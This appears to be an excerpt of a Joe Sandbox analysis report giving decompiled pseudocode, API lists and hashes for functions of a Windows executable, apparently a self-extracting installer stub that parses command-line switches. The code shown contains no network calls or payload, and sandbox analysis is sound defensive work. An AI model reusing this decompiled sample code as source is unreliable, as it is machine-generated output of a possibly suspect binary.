                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000265dc
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00028B3E,00028B3F,00000001,00028B3E,-00000003,?,000260EC,00021140,?), ref: 000265BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 8502a07590d0bce1220392503cec93633566f244086240fd91309f2fa786e82f
                                                                                                                                                                                                                                                • Instruction ID: b38ba3fb60df9b44a2e4e04a7105f5d4aca98cb7ee90f7c760a62d3a39439f25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8502a07590d0bce1220392503cec93633566f244086240fd91309f2fa786e82f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F042321046709BD331051DB884BABBFDD9B86350F28015FE8DAC3205CA674D4583A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0002621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x28004; // 0xf4950d3e
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0002597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E000244B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x29124 = E00026285();
					_t9 = 0;
				}
				return E00026CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                                0x00026229
                                                                                                                                                                                                                                                0x00026230
                                                                                                                                                                                                                                                0x00026247
                                                                                                                                                                                                                                                0x0002626a
                                                                                                                                                                                                                                                0x00026272
                                                                                                                                                                                                                                                0x00026249
                                                                                                                                                                                                                                                0x00026255
                                                                                                                                                                                                                                                0x0002625f
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026284

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0002623F
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: 44c079092130105075be7152bcb544e050faca65ed24f4648635ff216a42b6d0
                                                                                                                                                                                                                                                • Instruction ID: a8d21bffb2c423a53cdce755cbc2746862f300f0fd45757bc56aed13269cf09e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44c079092130105075be7152bcb544e050faca65ed24f4648635ff216a42b6d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F0E9B0700218ABE760FB74AD02FFE73ACDB44700F504069B985D7082DD759D458750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x28d64)) != 1) {
					_t7 = _t15 + 0x28d74; // 0x263e8d1f, executed
					_t9 = FindCloseChangeNotification( *_t7); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x28d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x28d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x28d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x28d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x28d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                                0x00024b66
                                                                                                                                                                                                                                                0x00024b74
                                                                                                                                                                                                                                                0x00024b92
                                                                                                                                                                                                                                                0x00024b98
                                                                                                                                                                                                                                                0x00024ba0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024bac
                                                                                                                                                                                                                                                0x00024ba4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00024ba4
                                                                                                                                                                                                                                                0x00024b78
                                                                                                                                                                                                                                                0x00024b7e
                                                                                                                                                                                                                                                0x00024b84
                                                                                                                                                                                                                                                0x00024b8a
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(263E8D1F,00000000,00000000,?,00024FA1,00000000), ref: 00024B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: aae4715185ca5686dbc57876ac18795259be2cd05710ad7cbbed88b4a77b6799
                                                                                                                                                                                                                                                • Instruction ID: aa674df909ad60000abb008e54b65523f4053852e780e29e26a70e5e939ea51f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aae4715185ca5686dbc57876ac18795259be2cd05710ad7cbbed88b4a77b6799
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF01235941B289E47728F39EC00692BBE8AB95361310893E946ED2190EB30A449CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000266AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000266AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                                0x000266b1
                                                                                                                                                                                                                                                0x000266ba
                                                                                                                                                                                                                                                0x000266c7
                                                                                                                                                                                                                                                0x000266bc
                                                                                                                                                                                                                                                0x000266be
                                                                                                                                                                                                                                                0x000266be

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00024777,?,00024E38,?), ref: 000266B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 0aa1d6dd9de10436112454348aa2406ce6ecc729802ad1da1c9d9c5c829b223c
                                                                                                                                                                                                                                                • Instruction ID: 30cc8263ddbe6a00304560dee5a8bbd4bd6aff180aa078aff8a443db5b2c9d46
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aa1d6dd9de10436112454348aa2406ce6ecc729802ad1da1c9d9c5c829b223c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AB09276222450476A6006317C6995A2881A7C233ABE41B90F032D01E0CE3ED846D004
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00024caa
                                                                                                                                                                                                                                                0x00024cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00024CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: e6f9c05bd4640328daeb776e4045491d1e360793968e704c1c2feb736adc26a2
                                                                                                                                                                                                                                                • Instruction ID: 1c8c7c6cf1ce3220bf12bab6c7481cf4a7280bd8c3b05c6324cf54446b2cbefe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6f9c05bd4640328daeb776e4045491d1e360793968e704c1c2feb736adc26a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6B0123214420CBBDF101FC2EC09F853F1DE7C5761F240000F60C450508E7694118696
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00024CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00024cc8
                                                                                                                                                                                                                                                0x00024ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: fa48901cbccdc3e9a4e48952e79dd7b82b779f35ba7e44fcfe0c34b03dd0cb7d
                                                                                                                                                                                                                                                • Instruction ID: c51f986f50cbc1cfa2f8b9012846e68c679ccb56bc0443c071225f9e29097db4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa48901cbccdc3e9a4e48952e79dd7b82b779f35ba7e44fcfe0c34b03dd0cb7d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEB0123100010CBB8F101B42EC088453F1DD7C13607100010F50C410218F3B98128585
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00025C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00025C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x28004; // 0xf4950d3e
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00026CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00026E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x28004; // 0xf4950d3e
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0002597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E000244B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x29124 = E00026285();
									_t75 = 0;
								}
								return E00026CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E000244B9(0, 0x521, 0x21140, 0, 0x40, 0);
												_t85 =  *0x28588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0002667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0002667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00025C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00021680(0x28c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0002667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0002667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x28a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00025C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x28b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x28a3a;
																}
																E00021680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0002658A(_t218, 0x104, 0x21140);
																if(E000231E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x28a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x28a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x28a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x28a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x28a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x29a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x29a2c =  *0x29a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x28d48 =  *0x28d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x29a2c =  *0x29a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x29a2c =  *0x29a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x28d48 =  *0x28d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x29a2c =  *0x29a2c | 0x00000004;
																										L70:
																										 *0x28a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x29a2c = 3;
																	 *0x28a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x28a2c != 0 &&  *0x28b3e == 0) {
						if(GetModuleFileNameA( *0x29a3c, 0x28b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E000266C8(0x28b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                                0x00025c9e
                                                                                                                                                                                                                                                0x00025ca9
                                                                                                                                                                                                                                                0x00025cb0
                                                                                                                                                                                                                                                0x00025cb3
                                                                                                                                                                                                                                                0x00025cb6
                                                                                                                                                                                                                                                0x00025cb7
                                                                                                                                                                                                                                                0x00025cb8
                                                                                                                                                                                                                                                0x00025cbd
                                                                                                                                                                                                                                                0x00026204
                                                                                                                                                                                                                                                0x00025ccb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ccb
                                                                                                                                                                                                                                                0x00025cd3
                                                                                                                                                                                                                                                0x00025cd7
                                                                                                                                                                                                                                                0x00025cf4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025cf4
                                                                                                                                                                                                                                                0x00025cf8
                                                                                                                                                                                                                                                0x00025d00
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d06
                                                                                                                                                                                                                                                0x00025d06
                                                                                                                                                                                                                                                0x00025d0e
                                                                                                                                                                                                                                                0x00025d10
                                                                                                                                                                                                                                                0x00025d12
                                                                                                                                                                                                                                                0x00025d14
                                                                                                                                                                                                                                                0x00025d15
                                                                                                                                                                                                                                                0x00025d17
                                                                                                                                                                                                                                                0x00025d49
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d19
                                                                                                                                                                                                                                                0x00025d19
                                                                                                                                                                                                                                                0x00025d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d3f
                                                                                                                                                                                                                                                0x00025d3f
                                                                                                                                                                                                                                                0x00025d4b
                                                                                                                                                                                                                                                0x00025d4b
                                                                                                                                                                                                                                                0x00025d4f
                                                                                                                                                                                                                                                0x00025d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d93
                                                                                                                                                                                                                                                0x00025d93
                                                                                                                                                                                                                                                0x00025d9a
                                                                                                                                                                                                                                                0x00025d9d
                                                                                                                                                                                                                                                0x00025d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d9e
                                                                                                                                                                                                                                                0x00025d51
                                                                                                                                                                                                                                                0x00025d5b
                                                                                                                                                                                                                                                0x00025d72
                                                                                                                                                                                                                                                0x000260fb
                                                                                                                                                                                                                                                0x000260fb
                                                                                                                                                                                                                                                0x00026207
                                                                                                                                                                                                                                                0x0002620a
                                                                                                                                                                                                                                                0x0002620b
                                                                                                                                                                                                                                                0x0002620e
                                                                                                                                                                                                                                                0x00026217
                                                                                                                                                                                                                                                0x00025d78
                                                                                                                                                                                                                                                0x00025d78
                                                                                                                                                                                                                                                0x00025d80
                                                                                                                                                                                                                                                0x00025d83
                                                                                                                                                                                                                                                0x00025d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d84
                                                                                                                                                                                                                                                0x00025d5d
                                                                                                                                                                                                                                                0x00025d5f
                                                                                                                                                                                                                                                0x00025d62
                                                                                                                                                                                                                                                0x00025d68
                                                                                                                                                                                                                                                0x00025d64
                                                                                                                                                                                                                                                0x00025d64
